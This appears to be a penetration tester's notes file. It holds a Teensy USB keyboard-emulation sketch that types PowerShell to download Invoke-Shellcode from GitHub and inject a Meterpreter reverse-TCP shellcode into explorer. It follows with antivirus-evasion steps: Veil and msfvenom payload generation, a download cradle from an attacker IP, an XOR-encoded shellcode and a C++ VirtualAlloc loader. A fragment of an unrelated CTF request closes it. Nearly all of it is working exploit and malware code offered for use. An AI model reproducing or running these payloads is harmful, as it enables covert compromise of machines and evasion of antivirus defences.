# Teensy sketch: Reverse Meterpreter


$ mkdir teensy
$ cd teensy
$ wget -O arduino-1.6.7-linux64.tar.xz https://www.arduino.cc/download.php?f=/arduino-1.6.7-linux64.tar.xz
$ tar xvf arduino-1.6.7-linux64.tar.xz
$ wget http://www.pjrc.com/teensy/td_127/teensyduino.64bit
$ chmod +x teensyduino.64bit
$ ./teensyduino.64bit
$ wget http://www.pjrc.com/teensy/49-teensy.rules
$ sudo cp 49-teensy.rules /etc/udev/rules.d/.
$ cd arduino-1.6.7
$ ./arduino
>> Tools > Board > Teensy 3.2
>> Tools > USB Type > Keyboard + Mouse + Joystick

// Sketch

const int led_pin = 13;

void blink_fast(int blinkrate, int delaytime) {
  pinMode(led_pin, OUTPUT);
  int blinkcounter = 0;
  for(blinkcounter = 0; blinkcounter != blinkrate; blinkcounter++) {
    digitalWrite(led_pin, HIGH);
    delay(delaytime);
    digitalWrite(led_pin, LOW);
    delay(delaytime);
  }
}

bool is_num_on(void) {
  return ((ledkeys() & 1) == 1) ? true : false;
}

int ledkeys(void) {
  return int(keyboard_leds);
}

void make_sure_numlock_is_off(void) {
  if (is_num_on())  {
    delay(100);
    press_numlock();
    delay(100);
    unpress_key();
    delay(100);
  }
}

void minimise_windows(void) {
  Keyboard.set_modifier((unsigned char) MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1((unsigned char) KEY_M);
  Keyboard.send_now();
  unpress_key();
}

void press_numlock(void) {
  Keyboard.set_key1((unsigned char) KEY_NUM_LOCK);
  Keyboard.send_now();
}

void reverse_meterpreter(void) {
  blink_fast(5, 75);
  Keyboard.println(F("$processid = ps explorer | select -expand id"));
  Keyboard.println(F("iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')"));
  Keyboard.println(F("invoke-shellcode -shellcode 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0x7f,0x00,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5 -force -processid $processid"));
  Keyboard.println(F("exit"));
}

void powershell_prompt(void) {
  blink_fast(5, 75);
  make_sure_numlock_is_off();
  Keyboard.set_modifier((unsigned char) MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1((unsigned char) KEY_R);
  Keyboard.send_now();
  unpress_key();
  delay(500);
  Keyboard.println("powershell");
  delay(200);
}

void unpress_key(void) {
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void wait_for_drivers(unsigned int speed) {
  bool numLockTrap = is_num_on();
  while(numLockTrap == is_num_on()) {
    blink_fast(5, 75);
    press_numlock();
    unpress_key();
    delay(speed);
  }
}

void setup() {
  wait_for_drivers(100);
  minimise_windows();
  powershell_prompt();
  reverse_meterpreter();
}

void loop() {
}

# Evading the AV to execute meterpreter



Veil

# veil-evasion

[menu>>]: list
[*] Available Payloads:

...
5) c/meterpreter/rev_tcp
...

[menu>>]: 5

Payload: c/meterpreter/rev_tcp loaded

[c/meterpreter/rev_tcp>>]: set lhost 192.168.0.1
[i] LHOST => 192.168.0.1
LPORT 4444
COMPILE_TO_EXE Y

[c/meterpreter/rev_tcp>>]: generate
[>] Please enter the base name for output files: meterpreter-veil

[*] Executable written to: /var/lib/veil-evasion/output/compiled/meterpreter-veil.exe

Language: c
Payload: c/meterpreter/rev_tcp
Required Options: COMPILE_TO_EXE=Y LHOST=192.168.0.1 LPORT=4444
Payload File: /var/lib/veil-evasion/output/source/meterpreter-veil.c
Handler File: /var/lib/veil-evasion/output/handlers/meterpreter-veil_handler.rc

[menu>>]: exit

# msfconsole --resource /var/lib/veil-evasion/output/handlers/meterpreter-veil_handler.rc


Powersploit

# msfvenom --arch x86_64 --platform windows --payload windows/x64/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 --format c 2>&1 | sed -e '1,3d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5

# msfconsole --resource meterpreter-powersploit_handler.rc

ps> iex (new-object net.webclient).downloadstring('http://192.168.0.1:8000/CodeExecution/Invoke-Shellcode.ps1')

ps> invoke-shellcode -shellcode 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5 -force


XOR routine and virtual allocation

# ipython

In [1]: meterpreter = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5]

In [2]: xored = ''

In [3]: for byte in meterpreter:
    xored += '\\' + hex(byte ^ ord('x'))[1:]
   ...:

In [4]: print xored
\x84\x30\xfb\x9c\x88\x90\xb4\x78\x78\x78\x39\x29\x39\x28\x2a\x29\x2e\x30\x49\xaa\x1d\x30\xf3\x2a\x18\x30\xf3\x2a\x60\x30\xf3\x2a\x58\x30\xf3\xa\x28\x30\x77\xcf\x32\x32\x35\x49\xb1\x30\x49\xb8\xd4\x44\x19\x4\x7a\x54\x58\x39\xb9\xb1\x75\x39\x79\xb9\x9a\x95\x2a\x39\x29\x30\xf3\x2a\x58\xf3\x3a\x44\x30\x79\xa8\x1e\xf9\x0\x60\x73\x7a\x77\xfd\xa\x78\x78\x78\xf3\xf8\xf0\x78\x78\x78\x30\xfd\xb8\xc\x1f\x30\x79\xa8\x28\xf3\x30\x60\x3c\xf3\x38\x58\x31\x79\xa8\x9b\x2e\x30\x87\xb1\x39\xf3\x4c\xf0\x30\x79\xae\x35\x49\xb1\x30\x49\xb8\xd4\x39\xb9\xb1\x75\x39\x79\xb9\x40\x98\xd\x89\x34\x7b\x34\x5c\x70\x3d\x41\xa9\xd\xa0\x20\x3c\xf3\x38\x5c\x31\x79\xa8\x1e\x39\xf3\x74\x30\x3c\xf3\x38\x64\x31\x79\xa8\x39\xf3\x7c\xf0\x30\x79\xa8\x39\x20\x39\x20\x26\x21\x22\x39\x20\x39\x21\x39\x22\x30\xfb\x94\x58\x39\x2a\x87\x98\x20\x39\x21\x22\x30\xf3\x6a\x91\x33\x87\x87\x87\x25\x31\xc6\xf\xb\x4a\x27\x4b\x4a\x78\x78\x39\x2e\x31\xf1\x9e\x30\xf9\x94\xd8\x79\x78\x78\x31\xf1\x9d\x31\xc4\x7a\x78\x69\x24\xb8\xd0\x78\x79\x39\x2c\x31\xf1\x9c\x34\xf1\x89\x39\xc2\x34\xf\x5e\x7f\x87\xad\x34\xf1\x92\x10\x79\x79\x78\x78\x21\x39\xc2\x51\xf8\x13\x78\x87\xad\x12\x7d\x39\x26\x28\x28\x35\x49\xb1\x35\x49\xb8\x30\x87\xb8\x30\xf1\xba\x30\x87\xb8\x30\xf1\xb9\x39\xc2\x92\x77\xa7\x98\x87\xad\x30\xf1\xbf\x12\x68\x39\x20\x34\xf1\x9a\x30\xf1\x81\x39\xc2\xe1\xdd\xc\x19\x87\xad\xfd\xb8\xc\x72\x31\x87\xb6\xd\x9d\x90\xeb\x78\x78\x78\x30\xfb\x94\x68\x30\xf1\x9a\x35\x49\xb1\x12\x7c\x39\x20\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x6\x2d\x30\xfb\xbc\x58\x26\xf1\x8e\x12\x38\x39\x21\x10\x78\x68\x78\x78\x39\x20\x30\xf1\x8a\x30\x49\xb1\x39\xc2\x20\xdc\x2b\x9d\x87\xad\x30\xf1\xbb\x31\xf1\xbf\x35\x49\xb1\x31\xf1\x88\x30\xf1\xa2\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x5\x50\x20\x39\x2f\x21\x10\x78\x38\x78\x78\x39\x20\x12\x78\x22\x39\xc2\x73\x57\x77\x48\x87\xad\x2f\x21\x39\xc2\xd\x16\x35\x19\x87\xad\x31\x87\xb6\x91\x44\x87\x87\x87\x30\x79\xbb\x30\x51\xbe\x30\xfd\x8e\xd\xcc\x39\x87\x9f\x20\x12\x78\x21\x31\xbf\xba\x88\xcd\xda\x2e\x87\xad

# cat meterpreter.cpp
#include <windows.h>
#include <iostream>

int main(int argc, char **argv) {
        char b[] = "\x84\x30\xfb\x9c\x88\x90\xb4\x78\x78\x78\x39\x29\x39\x28\x2a\x29\x2e\x30\x49\xaa\x1d\x30\xf3\x2a\x18\x30\xf3\x2a\x60\x30\xf3\x2a\x58\x30\xf3\xa\x28\x30\x77\xcf\x32\x32\x35\x49\xb1\x30\x49\xb8\xd4\x44\x19\x4\x7a\x54\x58\x39\xb9\xb1\x75\x39\x79\xb9\x9a\x95\x2a\x39\x29\x30\xf3\x2a\x58\xf3\x3a\x44\x30\x79\xa8\x1e\xf9\x0\x60\x73\x7a\x77\xfd\xa\x78\x78\x78\xf3\xf8\xf0\x78\x78\x78\x30\xfd\xb8\xc\x1f\x30\x79\xa8\x28\xf3\x30\x60\x3c\xf3\x38\x58\x31\x79\xa8\x9b\x2e\x30\x87\xb1\x39\xf3\x4c\xf0\x30\x79\xae\x35\x49\xb1\x30\x49\xb8\xd4\x39\xb9\xb1\x75\x39\x79\xb9\x40\x98\xd\x89\x34\x7b\x34\x5c\x70\x3d\x41\xa9\xd\xa0\x20\x3c\xf3\x38\x5c\x31\x79\xa8\x1e\x39\xf3\x74\x30\x3c\xf3\x38\x64\x31\x79\xa8\x39\xf3\x7c\xf0\x30\x79\xa8\x39\x20\x39\x20\x26\x21\x22\x39\x20\x39\x21\x39\x22\x30\xfb\x94\x58\x39\x2a\x87\x98\x20\x39\x21\x22\x30\xf3\x6a\x91\x33\x87\x87\x87\x25\x31\xc6\xf\xb\x4a\x27\x4b\x4a\x78\x78\x39\x2e\x31\xf1\x9e\x30\xf9\x94\xd8\x79\x78\x78\x31\xf1\x9d\x31\xc4\x7a\x78\x69\x24\xb8\xd0\x78\x79\x39\x2c\x31\xf1\x9c\x34\xf1\x89\x39\xc2\x34\xf\x5e\x7f\x87\xad\x34\xf1\x92\x10\x79\x79\x78\x78\x21\x39\xc2\x51\xf8\x13\x78\x87\xad\x12\x7d\x39\x26\x28\x28\x35\x49\xb1\x35\x49\xb8\x30\x87\xb8\x30\xf1\xba\x30\x87\xb8\x30\xf1\xb9\x39\xc2\x92\x77\xa7\x98\x87\xad\x30\xf1\xbf\x12\x68\x39\x20\x34\xf1\x9a\x30\xf1\x81\x39\xc2\xe1\xdd\xc\x19\x87\xad\xfd\xb8\xc\x72\x31\x87\xb6\xd\x9d\x90\xeb\x78\x78\x78\x30\xfb\x94\x68\x30\xf1\x9a\x35\x49\xb1\x12\x7c\x39\x20\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x6\x2d\x30\xfb\xbc\x58\x26\xf1\x8e\x12\x38\x39\x21\x10\x78\x68\x78\x78\x39\x20\x30\xf1\x8a\x30\x49\xb1\x39\xc2\x20\xdc\x2b\x9d\x87\xad\x30\xf1\xbb\x31\xf1\xbf\x35\x49\xb1\x31\xf1\x88\x30\xf1\xa2\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x5\x50\x20\x39\x2f\x21\x10\x78\x38\x78\x78\x39\x20\x12\x78\x22\x39\xc2\x73\x57\x77\x48\x87\xad\x2f\x21\x39\xc2\xd\x16\x35\x19\x87\xad\x31\x87\xb6\x91\x44\x87\x87\x87\x30\x79\xbb\x30\x51\xbe\x30\xfd\x8e\xd\xcc\x39\x87\x9f\x20\x12\x78\x21\x31\xbf\xba\x88\xcd\xda\x2e\x87\xad";
        char c[sizeof b];
        for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
        void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(exec, c, sizeof c);
        ((void(*)())exec)();
}
# # 32bits - i686-w64-mingw32-g++ -static-libstdc++ -static-libgcc -o meterpreter.exe meterpreter.cpp
# x86_64-w64-mingw32-g++ -static-libstdc++ -static-libgcc -o meterpreter.exe meterpreter.cpp

# FAQin 2k16: Escape from Matrix


# curl --user $id:$pass http://faqin.org/freeticket/crypto/index.php
...
 <br />Here is your data to escape from Matrix:<br /><br />
 <pre>
 1q2l2y2l2g2h0w2B2r2x2u0w1v1q0w2l2q0w2w2z2r0w2h2t2x2d2o0w2s2d2u2w2v0w2v2w2r2s0w1E2h2y2h
 2u2v2h0w2w2k2h0w2v2w2u2l2q2j0w2v2w2r2s0w2f2d2o2f2x2o2d2w2h0w2w2k2h0w2k2d2v2k0w2z2l2w2k
